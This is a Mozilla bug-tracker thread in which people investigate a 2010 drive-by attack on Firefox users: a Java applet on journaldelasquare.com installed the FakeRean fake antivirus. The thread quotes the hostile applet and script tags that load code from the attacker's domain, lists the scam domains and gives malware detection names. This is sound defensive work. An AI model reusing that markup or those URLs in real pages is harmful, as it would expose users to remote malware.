Closed Bug 561807 Opened 15 years ago Closed 1 year ago

journaldelasquare.com/news drive-by download and installation of ave.exe and other malware

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Platform:
x86_64
Windows Vista
Type:
defect

Tracking

()

Status:
RESOLVED INCOMPLETE

People

(Reporter: cooldued17, Unassigned)

References

(Blocks 1 open bug,
URL
)

Details

(Keywords: sec-vector, Whiteboard: [sg:vector-critical (Java)?][chofmann reproduced, will try again with newer Java])

Attachments

(14 files)

html of the page that downloadedthe file
5.34 KB, text/plain
Details
screen shot post firefox shutdown and infection
369.20 KB, image/png
Details
exploit.html
10.67 KB, text/plain
Details
exploit.js
4.83 KB, text/plain
Details
IE window offerning XP Security Tool 2010
132.48 KB, image/png
Details
xp security tool 2010 attack warning pop up
65.54 KB, image/png
Details
malware found by norton
17.79 KB, text/plain
Details
try again to save norton output
17.79 KB, text/plain
Details
third time must be the charm on dos conversion of norton data.
17.80 KB, text/plain
Details
this time for sure.
8.62 KB, text/plain
Details
Possible exploit jar
86.10 KB, image/png
Details
main.class
5.70 KB, text/plain
Details
main.class idx
554 bytes, text/plain
Details
decompiled source code
30.00 KB, application/x-tar
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) While browsing google, I clicked on a link which brought me to the page linked after which the file "ave.exe" was downloaded and run then firefox crashed. Reproducible: Didn't try Steps to Reproduce: 1.Visit URL
My antivirus is AVG FREE 9.0.814
Attachment #441536 - Attachment mime type: text/html → text/plain
Brett, did the Mozilla crash reporter show up? Can you check about:crashes for the crash report ID?
ave.exe is also known as av.exe and Trojan FakeRean. We have also seen a few instances of [obfuscated_name]ave.dll crashes in the crash data of the last month. The interesting part of this is how the download got kicked off automatically, and then launched. Brett, do you have anything set on your system that would kick off automatic downloads or stop the normal prompts to save the file and/or launch it? Here are the other reports for ave.dll crashes 20100412-crashdata.csv:kemifave.dll@0x114ba [porn site removed] http://crash-stats.mozilla.com/report/index/e33a655b-8507-4977-8869-a393b2100412 Firefox 3.6.3 Flash \N 20100413-crashdata.csv:olemyave.dll@0x43460 http://images.google.de/imgres?imgurl=http://tribeheaven.co.uk/cast/wp-content/uploads/2009/07/Tom-Hern-and-James-Napier-Robertson-Im-Not-Harry-Jenson-Interview-The-Tribe-Ram-and-Jay.jpg&imgrefurl=http://tribeheaven.co.uk/cast/2009/07/21/im-not-harry-jens http://crash-stats.mozilla.com/report/index/a55ab1fa-fa74-4d26-8476-207b92100413 Firefox 3.6 Flash \N 20100416-crashdata.csv:olemyave.dll@0x43460 http://www.zwigge.de/privmsg.un?folder=inbox http://crash-stats.mozilla.com/report/index/7f9e93d3-e426-4258-bf67-ffe992100416 Firefox 3.6 Flash 10.0.45.2 20100416-crashdata.csv:olewave.dll@0x2bbca about:blank http://crash-stats.mozilla.com/report/index/0ffac14e-de60-45a2-b208-b10e12100416 Firefox 3.6.3 Flash 10.0.12.36 20100416-crashdata.csv:olemyave.dll@0x43460 http://www.zwigge.de/album_page.un?pic_id=3093333&mode=next http://crash-stats.mozilla.com/report/index/cca79063-af6e-4c70-b748-13a892100416 Firefox 3.6 Flash 10.0.45.2 Also some reports where users mention being hacked by ave.exe or searching for instructions to repair. 20100401-crashdata.csv:UserCallWinProcCheckWow http://bleacherreport.com/articles/371546-josh-mcdaniels-the-greatest-ally-of-the-afc-west http://crash-stats.mozilla.com/report/index/d53c0ebd-94e0-403b-97fd-038692100401 Firefox 3.6.2 Flash "I just got hacked by that ""ave.exe"" panicware. this is the second time in two weeks that you're product missed this malware and allowed an attack. i may need to switch to something more reliable unless you can come up with a solution." 20100402-crashdata.csv:nsGlobalWindow::cycleCollection::UnmarkPurple(nsISupports*) http://www.istanto.net/how-to-remove-ave-exe-fake-antispyware.html http://crash-stats.mozilla.com/report/index/203bdb09-5c70-4f5c-93cf-8e5932100402 Firefox 3.6.2 Flash \N 20100406-crashdata.csv:nsTreeBodyFrame::GetPseudoStyleContext(nsIAtom*) \N http://crash-stats.mozilla.com/report/index/a9613d21-bc5d-404e-bd83-d81022100406 Firefox 3.6.3 Flash dont worry guys ... its not you its this **** virus I was just hacked with ... the file was called ave.exe ... shows up as vista antimaleware 2010 ... bunch of lame hackers ! now I need to reinstall everything on my pc !!! 20100407-crashdata.csv:ntload.dll@0x40f7 http://www.malwarehelp.org/ave-exe-a-multiple-rogues-in-one-trojan-fakerean-2010.html http://crash-stats.mozilla.com/report/index/6130c85a-4392-4747-bb41-b45042100407 Firefox 3.6.3 Flash \N 20100408-crashdata.csv:_PR_MD_SEND http://crash-stats.mozilla.com/report/index/754e6ec0-723c-4054-bb8d-65d902100408 Firefox 3.6 Flash \N just contracted the ave.exe virus 20100413-crashdata.csv:nsPluginHost::InstantiateFullPagePlugin(char const*, nsIURI*, nsIStreamListener*&, nsIPluginInstanceOwner*) http://www.google.com/search?hl=en&client=firefox-a&hs=4EB&rls=org.mozilla%3Aen-US%3Aofficial&channel=s&q=ave.exe+removal&aq=f&aqi=g1&aql=&oq=&gs_rfai= http://crash-stats.mozilla.com/report/index/26534a5e-63a2-402f-a085-b74ca2100413 Firefox 3.6.3 Flash \N \N 20100413-crashdata.csv:shlwapi.dll@0x2c4d8 http://scifi.com/ http://crash-stats.mozilla.com/report/index/80be9c7e-f040-4216-ae86-4a6ae2100413 Firefox 3.6.3 Flash \N Been having problems with Mozilla since upgrading. I found an unauthorized add-on which may be causing problems even though I disabled it (will not allow itself to be uninstalled). Occasionally get redirected to other sites. When enabled this add-on allows a virus to load (ave.exe). I will now have to uninstall Mozilla then reinstall to stop this and clean out the add-ons. My Norton AV says hard drive is clean of viruses. 20100414-crashdata.csv:__from_strstr_to_strchr http://rds.yahoo.com/_ylt=A0geu7y3IcZLMFwACj9XNyoA;_ylu=X3oDMTEzZDFoYXVmBHNlYwNzcgRwb3MDMQRjb2xvA2FjMgR2dGlkA0g1NDlfMTQ3/SIG=1224sn963/EXP=1271362359/**http%3a//www.spyware-fix.net/remove-ave-exe.html http://crash-stats.mozilla.com/report/index/67d27067-4647-4694-a90e-5a8da2100414 Firefox 3.6.3 Flash \N \N 20100414-crashdata.csv:StrChrIA http://www.google.ca/url?sa=t&source=web&ct=res&cd=1&ved=0CAYQFjAA&url=http%3A%2F%2Fwww.malwarehelp.org%2Fave-exe-a-multiple-rogues-in-one-trojan-fakerean-2010.html&ei=FLHGS5bwCYG6NZCRhO0I&usg=AFQjCNHe904naB2FO-DO32TmnwrmO6TuPQ http://crash-stats.mozilla.com/report/index/ac14e7ec-75bb-4730-8dac-d6dbf2100414 Firefox 3.6.3 Flash \N \N 20100423-crashdata.csv:nsCOMPtr<nsIXBLDocumentInfo>::~nsCOMPtr<nsIXBLDocumentInfo>() | PresShell::DoReflow(nsIFrame*, int) http://www.malwarehelp.org/ave-exe-a-multiple-rogues-in-one-trojan-fakerean-2010.html http://crash-stats.mozilla.com/report/index/d1dd6ece-7e58-43d9-8bcc-d25352100423 Firefox 3.6.3 Flash 10.0.45.2 \N
Blocks: malware-attacks
Summary: Upon visiting the given url a virus is downloaded and firefox crashes → Upon visiting the given url ave.exe virus is downloaded and firefox crashes
@Benjamin Smedberg:The crash reporter did not show up. I will check about:crashes when I get back home tonight. @chris hofmann: I have a addon that adds the download and run option to the file download prompt however I'm pretty sure it doesn't work with the latest firefox and is disabled, I'll check and post all possibly related addons when I get home tonight.
I think I was able to reproduce this on a winXP vm using the test URL. -hit the link. -some attempts at pop ups were made. -firefox disappeared -no crash dialog shown -then XP security tools kicked in and started detecting a variety of virus installations.
I tested the bug with Firefox(safe mode) no add-ons, this time I noticed the java console poped up in the system tray the moment the page loaded and disappeared at the same time as Firefox did.
And I just checked, I don't have any error logs from when Firefox closed due to the virus.
Attached file exploit.html
DOM->Source of exploit page. Requires Java.
Attached file exploit.js
referenced js file.
it went by quickly, but I think I saw one window that indicated "plugin not found" before firefox exited, so I wonder if there might be multiple paths. XP Security tool 2010 is recommending that I not start firefox until I clean up the system so I'll wait until the morning to clean up and see if I had java installed on that VM.
Status: UNCONFIRMED → NEW
Ever confirmed: true
submitted a request to get the test url blocked by safe browsing. http://badwarebusters.org/community/submit
Calvin, Thomas, and Hao, Is there anyone around on the Java team that can help investigate this?
Chris, Can you clarify which URL to use to reproduce the problem? I downloaded all the attachments. Neither data.html nor exploit.html references the exploit.js and neither one contains applet or embed tag. So I'm not sure how java is involved here.
Calvin, the link in the url field goes to the exploit. <http://journaldelasquare.com/news/data.html?ID=20344&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002T0RvaU1UVXlNRFV3T0RraU8zTTZNVEk2SW1Ga2RtVnlkR2x6WlY5cFpDSTdjem8yT2lJeE1ESXhNalFpTzNNNk5Eb2lhM0J3YVNJN1RqdDljem96T2lKdFpEVWlPM002TXpJNkltUTVNbUkxWkRBeVpHVTBPVGhpTm1RNE16RXpPRFpoTlRnNE9ERTVOamd4SWp0OQ%3D%3D> exploit.js was just the name I gave to the script that was referenced in the exploit.html file: <SCRIPT type = "text/javascript" src = "http://journaldelasquare.com/news/data.html?ID=20344&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002T0RvaU1UVXlNRFV3T0RraU8zTTZNVEk2SW1Ga2RtVnlkR2x6WlY5cFpDSTdjem8yT2lJeE1ESXhNalFpTzNNNk5Eb2lhM0J3YVNJN1RqdDljem96T2lKdFpEVWlPM002TXpJNkltUTVNbUkxWkRBeVpHVTBPVGhpTm1RNE16RXpPRFpoTlRnNE9ERTVOamd4SWp0OQ%3D%3D/t002105X5da00f28Y1675f9feZ07f02419Q00000000901800F0035010aJ00000000L656e2d55530000000000"> exploit.html (which is the translation of the DOM to HTML of the result of loading the first url) does include an applet: <APPLET width = "2" height = "2" archive = "http://journaldelasquare.com/news/data.html?ID=20344&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002T0RvaU1UVXlNRFV3T0RraU8zTTZNVEk2SW1Ga2RtVnlkR2x6WlY5cFpDSTdjem8yT2lJeE1ESXhNalFpTzNNNk5Eb2lhM0J3YVNJN1RqdDljem96T2lKdFpEVWlPM002TXpJNkltUTVNbUkxWkRBeVpHVTBPVGhpTm1RNE16RXpPRFpoTlRnNE9ERTVOamd4SWp0OQ%3D%3D/s002105303r0409X5da00f26Y1675f9feZ07f02419" code = "Main.class"> <PARAM name = "u" value = "687474703A2F2F6A6F75726E616C64656C617371756172652E636F6D2F6E6577732F646174612E68746D6C3F49443D32303334342666623D575652766555397564487050616D633253573557656C7059536D745A57464A6F535770306145397154545A6C4D303032545770766157465855576C504D303032543052766155315556586C4E52465633543052726155387A54545A4E56456B325357314761325274566E6C6B52327836576C5935634670445354646A656D387954326C4A654531455358684E616C4670547A4E4E4E6B354562326C684D304A3359564E4A4E31527164446C6A656D393654326C4B6446704556576C504D3030325458704A4E6B6C745554564E62556B78576B5242655670485654425056476870546D31524E453136525870505246706F546C526E4E4539455254564F616D6434535770304F512533442533442F6E30303231303533303372303430395835646130306632365931363735663966655A3037663032343139"> <PARAM name = "c" value = "2"> <PARAM name = "d" value = "0"> </APPLET>
Summary: Upon visiting the given url ave.exe virus is downloaded and firefox crashes → journaldelasquare.com/news drive-by download and installation of ave.exe and other malware
Domain Name:journaldelasquare.com Registrant: chic@qx8.ru Ekaterina Gilmanova +7.391660301 Ekaterina Gilmanova ul.Komsomolskaya d.39 kv.59 Norilsk,Krasnoyarskij kraj,RU 663300 Registrant Search: "Ekaterina Gilmanova" owns about534 other domains Email Search: chic@qx8.ru is associated with about 17 domains
Whiteboard: [sg:vector-critical (Java)?][chofmann reproduced, will try again with newer Java]
1.6.0_05 is the version of java installed on the windows vm I was testing on in comment 6 and 11.
journaldelasquare.com is unreachable. Ping also fails. Is there other way to reproduce without connecting to that server?
yeah, we can reach it now either. my guess is that the site has been pulled down and/or migrated to a different location. bc, I wonder if there is a way to try and host the content on a test server somewhere. we would need to put it under auth or other controls.
all this stuff was installed and detected in under a few seconds on my test vm. xp security tool 2010 detected 28 forms of malware Email-Worm.JS.Gigger IM-Worm.Win32.Kevir.k BWME.Twelve.1378 Devices.2000 IRC-Worm.DOS.Septic IRC-Worm.DOS.Loa P2P-Worm.Win32.Duload.a Happy_II.506 Joke.1068 P2P-Worm.Win32.Franvir Lemena.3544 Kot.b EICAR-Test-File Tojan-Cliker.Win32.Small.k Trojan-Spy.HTML.Bankfraud.jk DoS.Win32.DieWara Exploit.CodeBaseExec Trojan-Spy,HTML.Bankfraud.pa Trojan-Proxy.Win32.Agent.x Email-Worm.VBS.Peach Virus.Boot-DOS.B.1536 Macro.PPoint.ShapeShift Backdoor.Perl.AEI.16 Trojan-SMS.J2ME.RedBrowser.a (mobile phones running j2me) Trojan-Clicker.Win32.Stixo.d Also received message Attack from 63.155.148.147 port 11930 Attacked port 13018 IRC-Worm.DOS.Septic Attacked from 191.106.168.67 port 2714 Attacked port 5112 Threat: Trojan-PSW.Win32.Coced.219 Attacked from 1.244.30.53 port 10840 Attacked port 11950 Threat BWME.Twelve.1378 Attacked from 37.119.177.147 port 4460 Attacked port 4769 Threat Virus.BAT.8Fish
(In reply to comment #19) > bc, I wonder if there is a way > to try and host the content on a test server somewhere. we would need to put > it under auth or other controls. I should have grabbed the applet when I had the chance I guess. I worry about hosting in bugzilla in runnable form, but as a compressed tar ball or zip file it wouldn't be much of a threat. Would we really need to host it in runnable form somewhere? (In reply to comment #20) > xp security tool 2010 detected 28 forms of malware Isn't xp security tool 2010 a malware itself?
(In reply to comment #20) > all this stuff was installed and detected in under a few seconds on my test vm. > xp security tool 2010 detected 28 forms of malware > What is the directory path to those malware files? Can you also check if the applet's Main.class was downloaded? You can open the java deployment cache viewer by running the following command: javaws -viewer Select "Resources" in the pull-down menu. If the Main.class is there, please save it and attach to this report.
(In reply to comment #21) > (In reply to comment #19) > > > bc, I wonder if there is a way > > to try and host the content on a test server somewhere. we would need to put > > it under auth or other controls. > > I should have grabbed the applet when I had the chance I guess. I worry about > hosting in bugzilla in runnable form, but as a compressed tar ball or zip file > it wouldn't be much of a threat. Would we really need to host it in runnable > form somewhere? > I think if we want to get a better handle on this it would be good to get it posted somewhere. > > (In reply to comment #20) > > > xp security tool 2010 detected 28 forms of malware > > Isn't xp security tool 2010 a malware itself? yeah, a closer look showed it turned out to be malware as well. I'm running norton and maybe other av full scans to get a better idea of what's installed. xp security tool 2010 also sent me here to try and get me to update my "expired subscription" -> http://blacksecuritygroup.com/
xp security tool 2010 also sent me here to try and get me to give a credit card. -> http://security-pccare2010.com/?type=3 its in a loop showing me these warnings Attacked from 37.119.177.147 port 4460 Attacked port 4769 Threat Virus.BAT.8Fish [click to remove] then multiple opt in/opt out paths that all lead to these one of many sites that try and get me but a subscription.
Attached file this time for sure.
the metasploit items are from some earlier testing so I think its just the top 7 items in the payload. Bloodhound.Exploit.166 Trojan.Ducky.B Backdoor.Trojan Trojan Horse Bloodhound.Exploit.169 Bloodhound.Exploit.96 Trojan.Ducky.B
(In reply to comment #22) > (In reply to comment #20) > > all this stuff was installed and detected in under a few seconds on my test vm. > > xp security tool 2010 detected 28 forms of malware > > > > What is the directory path to those malware files? > > Can you also check if the applet's Main.class was downloaded? > > You can open the java deployment cache viewer by running the following command: > javaws -viewer > > Select "Resources" in the pull-down menu. > > If the Main.class is there, please save it and attach to this report. I believe I have found the jar file containing the main.class but I can't seem to save/extract the file from the java cache viewer. Anyone know how to get it out of the java cache?
Attached image Possible exploit jar
(In reply to comment #32) > (In reply to comment #22) > > (In reply to comment #20) > > > all this stuff was installed and detected in under a few seconds on my test vm. > > > xp security tool 2010 detected 28 forms of malware > > > > > > > What is the directory path to those malware files? > > > > Can you also check if the applet's Main.class was downloaded? > > > > You can open the java deployment cache viewer by running the following command: > > javaws -viewer > > > > Select "Resources" in the pull-down menu. > > > > If the Main.class is there, please save it and attach to this report. > I believe I have found the jar file containing the main.class but I can't seem > to save/extract the file from the java cache viewer. Anyone know how to get it > out of the java cache? I don't think you can save it directly from the cache viewer. If you're using XP, the default java deployment cache location is at: c:\Documents and Settings\<user name>\Application Data\Sun\Java\Deployment\cache substitute <user name> above with your user name there're sub-directories under the cache directory. You'll just need to list the files under the cache directory and its sub-directories and compare the size shown in the java cache viewer to get the right file(s). Note that the cached file names are randomized and there should be an index file (with .idx suffix) for each cached file. Please save the .idx file too.
> While browsing google, I clicked on a link which brought me to the [test url] hey brett, I also wonder if you recall the search you performed or the search results that you got, or if any of that is still in your history. Understanding these might help to track down the next place this attack might be hosted now that its been removed from journaldelasquare.com/news
I also submitted http://security-pccare2010.com/?type=3 and http://blacksecuritygroup.com/ to http://badwarebusters.org/community/submit That's not going to be entirely helpful in this particular attack since these pages were launched in chromeless IE windows, but it might be useful to firefox users that might wander on to the pages from other sources. Still no response back from stop badware folks on any of the requests. we really need to get a better streamlined escalation path with some contacts there. I'll see if others have contacts.
I guess we could submit those two urls to the IE safebrowsing system to help disrupt the flow of the bogus credit card charging/credit card stealling part of this attack, but: 1) I haven't figure out where microsoft take submissions to their safe browsing feature. anyone have a contact or know where to submit these requests? 2) I think it still won't block the urls on the majority of systems if the attacker is using IE6 to launch the chromeless and regular subscription offer browser windows.
dveditz suggests uploading the applet to http://www.virustotal.com/ and they will scan to find which AV packages can detect, and which malware pacakges might use the exploit. I'll try and do that later.
On my system there is C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0 then further subdirectories numbered 1 through 63 along with "host", "muffin", tmp, and a file called last access. all the numbered directories appear to be empty. maybe norton or something else already cleaned these up?
Attached file main.class
Alright I managed to fish the file out of the java cache, and I think* that I had googled "winamp 2 channel to 5.1" when the link came up but I'm not 100% on that since the first time I went to the site is not in my history.
Attached file main.class idx
At some point we should open this bug up to share more of what happened and get more eyes looking at possible defenses. Do we think we are ready to do that now? Is there anything that we would want to hold private?
Also submitted the attack and fake AV urls to http://www.google.com/safebrowsing/report_badware/
(In reply to comment #40) > Created an attachment (id=442292) [details] > main.class > Alright I managed to fish the file out of the java cache, and I think* that I > had googled "winamp 2 channel to 5.1" when the link came up but I'm not 100% on > that since the first time I went to the site is not in my history. The above attachement is actually a jar file, its content is: created: META-INF/ inflated: META-INF/MANIFEST.MF inflated: ________vload.class inflated: vlocal$sc.class inflated: vlocal.class inflated: vmain.class I doubted it's the resource for the applet for this bug because the applet references code = "Main.class". I also decompiled the vmain.class and it references: String str1 = getParameter("sdata"); String str2 = getParameter("slink"); The applet in question doesn't have the above html parameters set.
Attached file decompiled source code
Keywords: sec-vector
Keywords: sec-other
Group: core-security → firefox-core-security

In the process of migrating remaining bugs to the new severity system, the severity for this bug cannot be automatically determined. Please retriage this bug using the new severity system.

Severity: critical → --

The severity field is not set for this bug.
:serg, could you have a look please?

For more information, please visit BugBot documentation.

Flags: needinfo?(sgalich)

This bug is over a decade old and seems to involve Java, so I think we can close this.

Status: NEW → RESOLVED
Closed: 1 year ago
Flags: needinfo?(sgalich)
Resolution: --- → INCOMPLETE
Group: firefox-core-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: